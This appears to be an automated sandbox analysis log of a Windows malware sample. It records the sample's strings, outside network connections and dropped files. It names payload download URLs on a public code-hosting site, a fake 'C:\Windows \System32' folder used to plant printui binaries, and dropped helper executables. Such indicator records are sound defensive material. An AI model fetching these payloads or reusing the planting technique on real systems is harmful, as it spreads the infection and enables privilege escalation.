Source: Ld0f3NDosJ.exe, 00000003.00000002.2356433154.000001E8BF3C6000.00000004.00000020.00020000.00000000.sdmp, Ld0f3NDosJ.exe, 00000003.00000003.2334869302.000001E8BF3C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/panchitopistolesx/items/main/hardsvcupdt.exes
Source: svchost.exe, 00000035.00000002.3360728429.000001BB8BA13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2719522374.000001BB8BD06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/panchitopistolesx/items/main/nvg.dat
Source: svchost.exe, 00000035.00000003.2719522374.000001BB8BD06000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000002.3360844690.000001BB8BA48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/panchitopistolesx/items/main/usvcusb.dat
Source: pyld64.exe, 0000000E.00000000.2336381311.00007FF7FC91E000.00000002.00000001.01000000.00000006.sdmp, pyld64.exe, 0000000E.00000002.2442276535.00007FF7FC91E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B8FD4000.00000002.00000001.01000000.00000008.sdmp, usvcinsta64.exe, 00000018.00000002.2514383144.00007FF6B8FD4000.00000002.00000001.01000000.00000008.sdmp, svchost.exe, 00000035.00000002.3359858423.00000000660F4000.00000008.00000001.01000000.00000013.sdmpString found in binary or memory: https://www.gnu.org/licenses/
Source: svchost.exeString found in binary or memory: https://www.openssl.org/
Source: Ld0f3NDosJ.exe, 00000003.00000003.2284751779.000001E8C10DD000.00000004.00000020.00020000.00000000.sdmp, pyld64.exe, 0000000E.00000000.2336381311.00007FF7FC91E000.00000002.00000001.01000000.00000006.sdmp, pyld64.exe, 0000000E.00000002.2442276535.00007FF7FD31E000.00000002.00000001.01000000.00000006.sdmp, pyld64.exe, 0000000E.00000002.2442276535.00007FF7FC91E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B99D4000.00000002.00000001.01000000.00000008.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B8FD4000.00000002.00000001.01000000.00000008.sdmp, usvcinsta64.exe, 00000018.00000002.2514383144.00007FF6B8FD4000.00000002.00000001.01000000.00000008.sdmp, svchost.exe, 00000035.00000002.3362912098.00007FFDA33E1000.00000002.00000001.01000000.0000000E.sdmp, svchost.exe, 00000035.00000002.3362491724.00007FFD93C8E000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: https://www.openssl.org/H
Source: unknownNetwork traffic detected: HTTP traffic on port 63778 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63790
Source: unknownNetwork traffic detected: HTTP traffic on port 63796 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63793 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63799 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63778
Source: unknownNetwork traffic detected: HTTP traffic on port 63790 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63784 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63793
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63784
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63796
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63799
Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.6:63778 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.6:63784 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.6:63790 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.6:63793 version: TLS 1.2
Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.6:63796 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.6:63799 version: TLS 1.2
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA5581180 CryptAcquireContextW,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,53_2_00007FFDA5581180
Source: C:\Windows\System32\console_zero.exeCode function: 59_2_00007FFDA5581180 CryptAcquireContextW,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,59_2_00007FFDA5581180
Source: cmd.exeProcess created: 59
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeCode function: 3_2_00007FF646E594B0: DeviceIoControl,GetLastError,3_2_00007FF646E594B0
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeCode function: 3_2_00007FF646E47800 WTSGetActiveConsoleSessionId,WTSQueryUserToken,CreateProcessAsUserW,CloseHandle,CloseHandle,CloseHandle,_invalid_parameter_noinfo_noreturn,3_2_00007FF646E47800
Source: C:\Users\user\Desktop\pyld64.exeFile created: C:\Windows\System32\usvcinsta64.exeJump to behavior
Source: C:\Windows\System32\usvcinsta64.exeFile created: C:\Windows \System32\printui.exeJump to behavior
Source: C:\Windows\System32\usvcinsta64.exeFile created: C:\Windows \System32\printui.dllJump to behavior
Source: C:\Windows\System32\cmd.exeFile created: C:\Windows
Source: C:\Windows\System32\cmd.exeFile created: C:\Windows \System32
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\winsvcf
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\winsvcf\winlogsvc
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libcurl.dll
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\zlib1.dll
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libcrypto-3-x64.dll
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libiconv-2.dll
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libintl-9.dll
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libssl-3-x64.dll
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libwinpthread-1.dll
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\console_zero.exe
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libpq.dll
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\ucrtbased.dll
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\vcruntime140d.dll
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\x543664.dat
Source: C:\Windows\System32\svchost.exeFile created: c:\windows\system32\crypti.exe
Source: C:\Windows\System32\svchost.exeFile created: c:\windows\system32\crypti.exe
Source: C:\Windows\System32\svchost.exeFile created: c:\windows\system32\crypti.exe
Source: C:\Windows\System32\svchost.exeFile created: c:\windows\system32\crypti.exe
Source: C:\Windows\System32\svchost.exeFile created: c:\windows\system32\crypti.exe
Source: C:\Windows\System32\svchost.exeFile created: c:\windows\system32\crypti.exe
Source: C:\Windows\System32\svchost.exeFile created: c:\windows\system32\crypti.exe
Source: C:\Windows\System32\svchost.exeFile deleted: C:\Windows\System32\crypti.exe
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeCode function: 3_2_00007FF646E566B03_2_00007FF646E566B0
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeCode function: 3_2_00007FF646E700083_2_00007FF646E70008
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeCode function: 3_2_00007FF646E557703_2_00007FF646E55770
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeCode function: 3_2_00007FF646E720DC3_2_00007FF646E720DC
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeCode function: 3_2_00007FF646E6ADFC3_2_00007FF646E6ADFC
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeCode function: 3_2_00007FF646E56D803_2_00007FF646E56D80
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeCode function: 3_2_00007FF646E65EDC3_2_00007FF646E65EDC
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeCode function: 3_2_00007FF646E62E603_2_00007FF646E62E60
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeCode function: 3_2_00007FF646E58E3C3_2_00007FF646E58E3C
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeCode function: 3_2_00007FF646E64BD83_2_00007FF646E64BD8
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeCode function: 3_2_00007FF646E51BD03_2_00007FF646E51BD0
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeCode function: 3_2_00007FF646E71B843_2_00007FF646E71B84
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeCode function: 3_2_00007FF646E423503_2_00007FF646E42350
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeCode function: 3_2_00007FF646E625343_2_00007FF646E62534
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeCode function: 3_2_00007FF646E42CC03_2_00007FF646E42CC0
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeCode function: 3_2_00007FF646E4E9903_2_00007FF646E4E990
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeCode function: 3_2_00007FF646E4DB003_2_00007FF646E4DB00
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeCode function: 3_2_00007FF646E6EABC3_2_00007FF646E6EABC
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeCode function: 3_2_00007FF646E4E2A03_2_00007FF646E4E2A0
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeCode function: 3_2_00007FF646E6D2703_2_00007FF646E6D270
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeCode function: 3_2_00007FF646E432403_2_00007FF646E43240
Source: C:\Windows \System32\printui.exeCode function: 40_2_00007FF68C6210E040_2_00007FF68C6210E0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_6600A23053_2_6600A230
Source: C:\Windows\System32\svchost.exeCode function: 53_2_6601076053_2_66010760
Source: C:\Windows\System32\svchost.exeCode function: 53_2_6600981053_2_66009810
Source: C:\Windows\System32\svchost.exeCode function: 53_2_6600BC9053_2_6600BC90
Source: C:\Windows\System32\svchost.exeCode function: 53_2_660050A053_2_660050A0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_66019CB053_2_66019CB0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_6600ACD053_2_6600ACD0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_66004CE053_2_66004CE0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_6600DD2053_2_6600DD20
Source: C:\Windows\System32\svchost.exeCode function: 53_2_6600CD6053_2_6600CD60
Source: C:\Windows\System32\svchost.exeCode function: 53_2_6600E58053_2_6600E580
Source: C:\Windows\System32\svchost.exeCode function: 53_2_6600D5A053_2_6600D5A0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_660121B053_2_660121B0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_6828A0B053_2_6828A0B0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_6828C22053_2_6828C220
Source: C:\Windows\System32\svchost.exeCode function: 53_2_68281C1053_2_68281C10
Source: C:\Windows\System32\svchost.exeCode function: 53_2_6828350053_2_68283500
Source: C:\Windows\System32\svchost.exeCode function: 53_2_682926C153_2_682926C1
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFD942F71F053_2_00007FFD942F71F0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFD942F6C9853_2_00007FFD942F6C98
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFD9424BCB953_2_00007FFD9424BCB9
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFD94244CAC53_2_00007FFD94244CAC
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFD9424B4F053_2_00007FFD9424B4F0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFD9424AD4053_2_00007FFD9424AD40
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFD942428F053_2_00007FFD942428F0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFD942C21A053_2_00007FFD942C21A0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFD942E668853_2_00007FFD942E6688
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFD9424E35053_2_00007FFD9424E350
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFD94243B2053_2_00007FFD94243B20
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFD942443D153_2_00007FFD942443D1
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3330EB053_2_00007FFDA3330EB0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA338131053_2_00007FFDA3381310
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33AC28053_2_00007FFDA33AC280
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA336835053_2_00007FFDA3368350
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33422E053_2_00007FFDA33422E0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA338A2E053_2_00007FFDA338A2E0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA335C24053_2_00007FFDA335C240
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA332221053_2_00007FFDA3322210
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA336C21053_2_00007FFDA336C210
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA337E0F053_2_00007FFDA337E0F0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA338A6B053_2_00007FFDA338A6B0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA336C70053_2_00007FFDA336C700
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA338059053_2_00007FFDA3380590
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA333C61053_2_00007FFDA333C610
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA339055053_2_00007FFDA3390550
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA338E4E053_2_00007FFDA338E4E0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3378B6053_2_00007FFDA3378B60
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA334CA9053_2_00007FFDA334CA90
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA338CB3053_2_00007FFDA338CB30
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33A69E053_2_00007FFDA33A69E0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3382FA053_2_00007FFDA3382FA0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA336EDC053_2_00007FFDA336EDC0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3394CC053_2_00007FFDA3394CC0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3384CD053_2_00007FFDA3384CD0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA332538053_2_00007FFDA3325380
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA336F42053_2_00007FFDA336F420
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA332740053_2_00007FFDA3327400
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33A92A053_2_00007FFDA33A92A0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33432C053_2_00007FFDA33432C0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA337D26053_2_00007FFDA337D260
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33970A053_2_00007FFDA33970A0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA337F0F053_2_00007FFDA337F0F0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA333B83053_2_00007FFDA333B830
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33856E053_2_00007FFDA33856E0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33834C053_2_00007FFDA33834C0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA332FBB053_2_00007FFDA332FBB0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3385C2053_2_00007FFDA3385C20
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3323C4053_2_00007FFDA3323C40
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33A9C4053_2_00007FFDA33A9C40
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA337DAD053_2_00007FFDA337DAD0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33938C053_2_00007FFDA33938C0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA339985F53_2_00007FFDA339985F
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA333B95053_2_00007FFDA333B950
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA335202053_2_00007FFDA3352020
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA332C03053_2_00007FFDA332C030
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3387FE053_2_00007FFDA3387FE0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA334DEA053_2_00007FFDA334DEA0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3395E8053_2_00007FFDA3395E80
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3399CC153_2_00007FFDA3399CC1
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33A1D3053_2_00007FFDA33A1D30
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3788D7053_2_00007FFDA3788D70
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA378344053_2_00007FFDA3783440
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3776AE053_2_00007FFDA3776AE0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA378E8E053_2_00007FFDA378E8E0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA37908B053_2_00007FFDA37908B0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA378E82053_2_00007FFDA378E820
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA378DF0053_2_00007FFDA378DF00
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA55377AB53_2_00007FFDA55377AB
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA553817D53_2_00007FFDA553817D
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA5532A1053_2_00007FFDA5532A10
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA553D08053_2_00007FFDA553D080
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA553794B53_2_00007FFDA553794B
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA553152053_2_00007FFDA5531520
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA55BB47053_2_00007FFDA55BB470
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA55C278053_2_00007FFDA55C2780
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA5577EE053_2_00007FFDA5577EE0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA5591AC053_2_00007FFDA5591AC0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA55CBA8653_2_00007FFDA55CBA86
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA5572B2053_2_00007FFDA5572B20
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA55C857053_2_00007FFDA55C8570
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA558C62053_2_00007FFDA558C620
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA558261053_2_00007FFDA5582610
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA55A84C053_2_00007FFDA55A84C0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA55C453053_2_00007FFDA55C4530
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA55B84F053_2_00007FFDA55B84F0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA55BB79053_2_00007FFDA55BB790
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA55A76B053_2_00007FFDA55A76B0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA557D66053_2_00007FFDA557D660
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA55A666053_2_00007FFDA55A6660
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA55801D053_2_00007FFDA55801D0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA558118053_2_00007FFDA5581180
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA55C318053_2_00007FFDA55C3180
Source: C:\Windows\System32\console_zero.exeCode function: 59_2_00007FF6F8C58A6059_2_00007FF6F8C58A60
Source: C:\Windows\System32\console_zero.exeCode function: 59_2_00007FF6F8C701B859_2_00007FF6F8C701B8
Source: C:\Windows\System32\console_zero.exeCode function: 59_2_00007FF6F8C791DC59_2_00007FF6F8C791DC
Source: C:\Windows\System32\console_zero.exeCode function: 59_2_00007FF6F8C5630059_2_00007FF6F8C56300
Source: C:\Windows\System32\console_zero.exeCode function: 59_2_00007FF6F8C60AB059_2_00007FF6F8C60AB0
Source: C:\Windows\System32\console_zero.exeCode function: 59_2_00007FF6F8C852A059_2_00007FF6F8C852A0
Source: C:\Windows\System32\console_zero.exeCode function: 59_2_00007FF6F8C55A7059_2_00007FF6F8C55A70
Source: C:\Windows\System32\console_zero.exeCode function: 59_2_00007FF6F8C8226059_2_00007FF6F8C82260
Source: C:\Windows\System32\console_zero.exeCode function: 59_2_00007FF6F8C6DC1059_2_00007FF6F8C6DC10
Source: C:\Windows\System32\console_zero.exeCode function: 59_2_00007FF6F8C78BC859_2_00007FF6F8C78BC8
Source: C:\Windows\System32\console_zero.exeCode function: 59_2_00007FF6F8C623F059_2_00007FF6F8C623F0
Source: C:\Windows\System32\console_zero.exeCode function: 59_2_00007FF6F8C885FC59_2_00007FF6F8C885FC
Source: C:\Windows\System32\console_zero.exeCode function: 59_2_00007FF6F8C69DB059_2_00007FF6F8C69DB0
Source: C:\Windows\System32\console_zero.exeCode function: 59_2_00007FF6F8C6755059_2_00007FF6F8C67550
Source: C:\Windows\System32\console_zero.exeCode function: 59_2_00007FF6F8C51E4059_2_00007FF6F8C51E40
Source: C:\Windows\System32\console_zero.exeCode function: 59_2_00007FF6F8C867EC59_2_00007FF6F8C867EC
Source: C:\Windows\System32\console_zero.exeCode function: 59_2_00007FF6F8C7B79459_2_00007FF6F8C7B794
Source: C:\Windows\System32\console_zero.exeCode function: 59_2_00007FF6F8C8376459_2_00007FF6F8C83764
Source: C:\Windows\System32\console_zero.exeCode function: 59_2_00007FF6F8C7A93459_2_00007FF6F8C7A934
Source: C:\Windows\System32\console_zero.exeCode function: 59_2_00007FF6F8C600F059_2_00007FF6F8C600F0
Source: C:\Windows\System32\console_zero.exeCode function: 59_2_00007FF6F8C5688059_2_00007FF6F8C56880
Source: C:\Windows\System32\console_zero.exeCode function: 59_2_00007FF6F8C880A459_2_00007FF6F8C880A4
Source: C:\Windows\System32\console_zero.exeCode function: 59_2_00007FFDA55C857059_2_00007FFDA55C8570
Source: C:\Windows\System32\console_zero.exeCode function: 59_2_00007FFDA558C62059_2_00007FFDA558C620
Source: C:\Windows\System32\console_zero.exeCode function: 59_2_00007FFDA558261059_2_00007FFDA5582610
Source: C:\Windows\System32\console_zero.exeCode function: 59_2_00007FFDA55A84C059_2_00007FFDA55A84C0
Source: C:\Windows\System32\console_zero.exeCode function: 59_2_00007FFDA55BB47059_2_00007FFDA55BB470
Source: C:\Windows\System32\console_zero.exeCode function: 59_2_00007FFDA55C453059_2_00007FFDA55C4530
Source: C:\Windows\System32\console_zero.exeCode function: 59_2_00007FFDA55B84F059_2_00007FFDA55B84F0
Source: C:\Windows\System32\console_zero.exeCode function: 59_2_00007FFDA55C278059_2_00007FFDA55C2780
Source: C:\Windows\System32\console_zero.exeCode function: 59_2_00007FFDA55BB79059_2_00007FFDA55BB790
Source: C:\Windows\System32\console_zero.exeCode function: 59_2_00007FFDA55A76B059_2_00007FFDA55A76B0
Source: C:\Windows\System32\console_zero.exeCode function: 59_2_00007FFDA557D66059_2_00007FFDA557D660
Source: C:\Windows\System32\console_zero.exeCode function: 59_2_00007FFDA55A666059_2_00007FFDA55A6660
Source: C:\Windows\System32\console_zero.exeCode function: 59_2_00007FFDA55801D059_2_00007FFDA55801D0
Source: C:\Windows\System32\console_zero.exeCode function: 59_2_00007FFDA558118059_2_00007FFDA5581180
Source: C:\Windows\System32\console_zero.exeCode function: 59_2_00007FFDA55C318059_2_00007FFDA55C3180
Source: C:\Windows\System32\console_zero.exeCode function: 59_2_00007FFDA559E3C059_2_00007FFDA559E3C0
Source: C:\Windows\System32\console_zero.exeCode function: 59_2_00007FFDA558238059_2_00007FFDA5582380
Source: C:\Windows\System32\console_zero.exeCode function: 59_2_00007FFDA55BF43059_2_00007FFDA55BF430
Source: C:\Windows\System32\console_zero.exeCode function: 59_2_00007FFDA55B5D0059_2_00007FFDA55B5D00
Source: C:\Windows\System32\console_zero.exeCode function: 59_2_00007FFDA55A8E6059_2_00007FFDA55A8E60
Source: C:\Windows\System32\console_zero.exeCode function: 59_2_00007FFDA5577EE059_2_00007FFDA5577EE0
Source: C:\Windows\System32\console_zero.exeCode function: 59_2_00007FFDA55A6C3E59_2_00007FFDA55A6C3E
Source: C:\Windows\System32\console_zero.exeCode function: 59_2_00007FFDA5591AC059_2_00007FFDA5591AC0
Source: C:\Windows\System32\console_zero.exeCode function: 59_2_00007FFDA55CBA8659_2_00007FFDA55CBA86
Source: C:\Windows\System32\console_zero.exeCode function: 59_2_00007FFDA55ABA8059_2_00007FFDA55ABA80
Source: C:\Windows\System32\console_zero.exeCode function: 59_2_00007FFDA5572B2059_2_00007FFDA5572B20
Source: C:\Windows\System32\crypti.exeCode function: 84_2_00007FF6D352718084_2_00007FF6D3527180
Source: C:\Windows\System32\crypti.exeCode function: 84_2_00007FF6D3573C1884_2_00007FF6D3573C18
Source: C:\Windows\System32\crypti.exeCode function: 84_2_00007FF6D353A3E084_2_00007FF6D353A3E0
Source: C:\Windows\System32\crypti.exeCode function: 84_2_00007FF6D352C2B084_2_00007FF6D352C2B0
Source: C:\Windows\System32\crypti.exeCode function: 84_2_00007FF6D352D2B084_2_00007FF6D352D2B0
Source: C:\Windows\System32\crypti.exeCode function: 84_2_00007FF6D354925884_2_00007FF6D3549258
Source: C:\Windows\System32\crypti.exeCode function: 84_2_00007FF6D355F25484_2_00007FF6D355F254
Source: C:\Windows\System32\crypti.exeCode function: 84_2_00007FF6D354825084_2_00007FF6D3548250
Source: C:\Windows\System32\crypti.exeCode function: 84_2_00007FF6D356B2FC84_2_00007FF6D356B2FC
Source: C:\Windows\System32\crypti.exeCode function: 84_2_00007FF6D357030084_2_00007FF6D3570300
Source: C:\Windows\System32\crypti.exeCode function: 84_2_00007FF6D352619084_2_00007FF6D3526190
Source: C:\Windows\System32\crypti.exeCode function: 84_2_00007FF6D35611F884_2_00007FF6D35611F8
Source: C:\Windows\System32\crypti.exeCode function: 84_2_00007FF6D35341E084_2_00007FF6D35341E0
Source: C:\Windows\System32\crypti.exeCode function: 84_2_00007FF6D354879084_2_00007FF6D3548790
Source: C:\Windows\System32\crypti.exeCode function: 84_2_00007FF6D352582084_2_00007FF6D3525820
Source: C:\Windows\System32\crypti.exeCode function: 84_2_00007FF6D356A7EC84_2_00007FF6D356A7EC
Source: C:\Windows\System32\crypti.exeCode function: 84_2_00007FF6D354A7F084_2_00007FF6D354A7F0
Source: C:\Windows\System32\crypti.exeCode function: 84_2_00007FF6D356167C84_2_00007FF6D356167C
Source: C:\Windows\System32\crypti.exeCode function: 84_2_00007FF6D352671084_2_00007FF6D3526710
Source: C:\Windows\System32\crypti.exeCode function: 84_2_00007FF6D35736C084_2_00007FF6D35736C0
Source: C:\Windows\System32\crypti.exeCode function: 84_2_00007FF6D356D56884_2_00007FF6D356D568
Source: C:\Windows\System32\crypti.exeCode function: 84_2_00007FF6D353A5C084_2_00007FF6D353A5C0
Source: C:\Windows\System32\crypti.exeCode function: 84_2_00007FF6D356AC8484_2_00007FF6D356AC84
Source: C:\Windows\System32\crypti.exeCode function: 84_2_00007FF6D3548B9684_2_00007FF6D3548B96
Source: C:\Windows\System32\crypti.exeCode function: 84_2_00007FF6D3563B7884_2_00007FF6D3563B78
Source: C:\Windows\System32\crypti.exeCode function: 84_2_00007FF6D3552B5884_2_00007FF6D3552B58
Source: C:\Windows\System32\crypti.exeCode function: 84_2_00007FF6D356BBF084_2_00007FF6D356BBF0
Source: C:\Windows\System32\crypti.exeCode function: 84_2_00007FF6D352CBC084_2_00007FF6D352CBC0
Source: C:\Windows\System32\crypti.exeCode function: 84_2_00007FF6D353ABD084_2_00007FF6D353ABD0
Source: C:\Windows\System32\crypti.exeCode function: 84_2_00007FF6D3538AA084_2_00007FF6D3538AA0
Source: C:\Windows\System32\crypti.exeCode function: 84_2_00007FF6D354898084_2_00007FF6D3548980
Source: C:\Windows\System32\crypti.exeCode function: 84_2_00007FF6D356CA0084_2_00007FF6D356CA00
Source: C:\Windows\System32\crypti.exeCode function: 84_2_00007FF6D355F05084_2_00007FF6D355F050
